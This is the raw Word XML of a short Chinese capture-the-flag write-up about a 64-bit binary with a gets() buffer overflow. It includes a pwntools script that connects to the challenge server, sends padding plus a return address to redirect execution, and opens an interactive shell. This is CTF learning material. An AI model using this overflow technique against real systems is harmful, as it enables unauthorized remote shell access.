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3BC1" w14:textId="27DF0B17" w:rsidR="00301132" w:rsidRDefault="00301132" w:rsidP="00301132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301132">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32F2817F" wp14:editId="4DAEB36E">
            <wp:extent cx="5130800" cy="1949450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="197954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636C" w14:textId="7D20D6F3" w:rsidR="00301132" w:rsidRDefault="00301132" w:rsidP="00301132">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放到64位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="0063657D" w:rsidRPr="0063657D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FE3172B" wp14:editId="204BFD74">
            <wp:extent cx="5274310" cy="1929765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="149530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0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D5BD" w14:textId="22858FC3" w:rsidR="0063657D" w:rsidRDefault="0063657D" w:rsidP="0063657D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shift+f12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8C63ED" w14:textId="5BA31F28" w:rsidR="0063657D" w:rsidRDefault="0063657D" w:rsidP="0063657D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0063657D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BEF1C1F" wp14:editId="5F62AD04">
            <wp:extent cx="5274310" cy="1709420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1773652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2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7E6E" w14:textId="725C92F5" w:rsidR="0063657D" w:rsidRDefault="0063657D" w:rsidP="0063657D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是这题是个3分的题，但我感觉好简单，他的溢出点很明显就是gets函数，然后bin/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也就摆那了，甚至不需要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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E08FD19" w14:textId="735F8D59" w:rsidR="0063657D" w:rsidRDefault="0063657D" w:rsidP="0063657D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看一下我写的脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4766A223" w14:textId="77777777" w:rsidR="0063657D" w:rsidRDefault="0063657D" w:rsidP="0063657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47670270" w14:textId="77777777" w:rsidR="0063657D" w:rsidRDefault="0063657D" w:rsidP="0063657D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p =remote('61.147.171.103',63333)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D567D7" w14:textId="77777777" w:rsidR="0063657D" w:rsidRDefault="0063657D" w:rsidP="0063657D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>context(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= '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' , </w:t>
      </w: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 xml:space="preserve"> = "debug")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FD852F" w14:textId="77777777" w:rsidR="0063657D" w:rsidRDefault="0063657D" w:rsidP="0063657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 xml:space="preserve">"*0x200 +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'*8 + p64(0x4005F6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EB535B" w14:textId="77777777" w:rsidR="0063657D" w:rsidRDefault="0063657D" w:rsidP="0063657D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p.sendline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF9A5EF" w14:textId="3CE9D0DB" w:rsidR="0063657D" w:rsidRPr="00301132" w:rsidRDefault="0063657D" w:rsidP="0063657D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p.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0063657D" w:rsidRPr="00301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08A6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A45030DC"/>
    <w:lvl w:ilvl="0" w:tplc="DEA60D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599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32"/>
    <w:rsid w:val="00301132"/>
    <w:rsid w:val="0063657D"/>
    <w:rsid w:val="00F4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D364"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{263FEC10-6B4E-4F7E-A01E-99645BF4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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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2025-10-21T11:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-21T11:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>